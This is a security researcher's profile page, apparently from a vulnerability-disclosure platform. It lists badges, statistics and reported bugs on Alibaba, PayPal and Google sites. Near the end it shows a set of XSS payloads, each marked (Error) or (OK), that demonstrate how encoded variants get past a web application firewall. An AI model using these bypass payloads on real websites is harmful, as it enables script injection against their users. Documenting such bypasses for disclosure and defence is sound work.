RAndo | Security Researcher Profile
Security researcher RAndo has already helped fix 7 vulnerabilities.
Researcher reputation: 0
Real name:
Alessandro Rumampuk
About me:
hello world!
Contact email:
hello world!
Alternative Contacts:
hello world!
Certifications & Diplomas:
hello world!
Experience in Application Security
3-5 years
Award / Bug Bounty I prefer:
Get clothes, And Money.
Halls of Fame:
hello world!
Recommendations and Acknowledgements
Honor Badges
Number of Secured Websites
|
|
|
|
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
|
|
|
|
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
|
|
|
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
|
|
|
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
|
|
|
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
|
|
|
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 23 |
Total reports on VIP sites: | 11 |
Total patched vulnerabilities: | 7 |
Active since: | 31.12.2019 |
Reported Vulnerabilities
All Submissions VIP SubmissionsFeatured Submissions
Domain | Reported | Status | Type |
---|
04.04.2020 (Alibaba) message.alibaba.com [IDOR] - [Bug Bounty]
12.03.2020 (Paypal) www.paypal.com [CSP High Level] - [XSS Reflected] - [Bug Bounty] - [Write Up]
29.02.2020 (Google) groups.google.com - [Stored XSS] - [Bug Bounty] - [WriteUp] - [24/02/2020]
20.01.2020 XSS on "www.alibaba.com" (Alibaba WAF 405) Bypassed.
08.01.2020 XSS WAF Bypassed
</script><svg onload=alert(1)> = (Error)
</script><!--><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)
</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)
<a href="javascript:alert(1)">href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D"%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;">href</a> = (OK)
<input value="testtest" onclick="alert(1)"> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)
<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)
'-confirm(1)-' = (Error)
<!'/!"/\'/\"/*/-top[`
`]`1`//><svg> = (OK)con\x66irm
<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}
`> = (OK)
Thank's You, And best regards!!!
Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Gmail : [email protected]
Paypal : paypal.me/Rando784
Please login via Twitter to add a recommendation